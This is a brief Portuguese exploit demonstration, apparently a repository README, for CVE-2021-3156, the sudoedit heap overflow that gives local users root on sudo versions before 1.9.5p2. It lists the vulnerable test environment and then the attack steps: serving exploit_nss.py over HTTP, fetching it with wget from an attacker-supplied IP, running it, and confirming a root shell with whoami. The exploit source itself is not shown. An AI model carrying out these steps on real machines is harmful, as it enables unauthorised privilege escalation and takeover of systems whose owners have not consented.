
CVE-2021-3156-Exploit-Demo
📅 Data: 2025-06-08
✍️ Autor: @TopskiyPavelQwertyGang
🧠 Pesquisador de Segurança | Entusiasta de Red Team
sudoedit (sudo)Um heap-overflow no sudoedit permite que um usuário local obtenha acesso root ao executar o comando sudoedit com parâmetros pré‑preparados.
A exploração é ativa para versões do sudo < 1.9.5p2, incluindo imagens populares do Ubuntu/Debian/CentOS.
Mesmo com o ASLR ativado, a vulnerabilidade permanece explorável.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
glibc e sudo:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
A exploração do CVE-2021-3156 continua possível mesmo com o ASLR ativo, se o glibc ≥ 2.26 e o sudo estiverem em uma versão vulnerável.
O exploit mais estável foi o exploit_nss.py, que funciona na primeira tentativa com uma configuração correta do NSS.
🧨 Sistema sob controle.